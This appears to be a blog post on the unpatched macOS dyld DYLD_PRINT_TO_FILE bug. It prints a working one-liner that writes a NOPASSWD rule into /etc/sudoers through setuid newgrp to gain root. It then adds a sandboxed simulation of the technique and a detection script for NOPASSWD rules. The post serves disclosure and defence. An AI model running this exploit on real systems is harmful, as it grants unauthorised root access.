Several weeks ago, Stefan Esser (known for his iOS jailbreak work) discovered and published a vulnerability in dyld, Apple's dynamic linker: its DYLD_PRINT_TO_FILE logging option is honoured even when the binary being loaded is setuid root. To this day, the vulnerability remains unpatched.
Once you have an ordinary, unprivileged account on a Mac OS X system, getting root is trivial.
By default, sudo is protected by your account password.
$ sudo su -
Password:
However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.
$ id
uid=1390866408(mattias)
$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s
$ id
uid=0(root) gid=0(wheel)
A single one-liner that elevates your privileges and never asks for a password. It works because newgrp is setuid root: dyld sees DYLD_PRINT_TO_FILE, opens /etc/sudoers for writing with root privileges before newgrp even runs, and leaves that descriptor (fd 3) open. The shell that newgrp spawns inherits it, so the echo appends a NOPASSWD rule to /etc/sudoers, and the following sudo -s simply honours the new rule.
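To make the descriptor-inheritance trick concrete, and to show what it leaves behind, here is an added example (not from the original post, and not Apple's or Esser's code). It simulates the two halves of the attack on a constructed copy of sudoers in a temp directory: a parent process opens the file on fd 3 and a child writes through it with `>&3`, exactly as the one-liner does, except that the shell plays the role of dyld and newgrp and nothing runs as root. The `inject_rule`, `audit_sudoers` and `audit_count` function names and the sample sudoers content are assumptions of this example; the user name is taken from the post.

```shell
#!/bin/sh
# Added illustration, not part of the original post. Works on a constructed
# copy of sudoers in a temp dir, never on the real /etc/sudoers.

WORK=$(mktemp -d)
SUDOERS="$WORK/sudoers"

# Constructed sample sudoers (assumption): stock-looking rules, no NOPASSWD.
cat > "$SUDOERS" <<'EOF'
# User privilege specification
Defaults        env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
EOF

# Stand-in for the dyld + newgrp behaviour: the parent opens the target on fd 3
# for append and leaves it open; the command it runs inherits that descriptor
# and writes through ">&3". The real bug differs only in that dyld does the
# open() with root privileges inside a setuid process, which this does not.
inject_rule() {
    target=$1
    user=$2
    (
        exec 3>>"$target"                                          # "dyld" opens fd 3
        sh -c 'echo "$1 ALL=(ALL) NOPASSWD:ALL" >&3' sh "$user"    # "newgrp" child writes
    )
}

# Detection: list every rule granting NOPASSWD to a principal other than root.
# Skips comments, blank lines and Defaults lines; tabs and spaces both work.
audit_sudoers() {
    grep -v '^[[:space:]]*#' "$1" \
      | grep -v '^[[:space:]]*$' \
      | grep -v '^[[:space:]]*Defaults' \
      | grep 'NOPASSWD' \
      | awk '$1 != "root"'
}

# Number of such rules; 0 means clean.
audit_count() {
    audit_sudoers "$1" | awk 'END { print NR }'
}

BEFORE=$(audit_count "$SUDOERS")          # expected: 0 on the clean copy
inject_rule "$SUDOERS" mattias
AFTER=$(audit_count "$SUDOERS")           # expected: 1
echo "NOPASSWD rules before: $BEFORE, after: $AFTER"
audit_sudoers "$SUDOERS"
```

On a real system point `audit_sudoers` at /etc/sudoers (you need root to read it) and remember it does not follow `#include`/`#includedir` lines or backslash continuations, so check /etc/sudoers.d as well; `sudo -l` for the suspect account is the authoritative answer.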
It's one thing that this happened. It's software, and we expect bugs. It's quite another that the problem still isn't patched weeks after a working exploit became publicly known.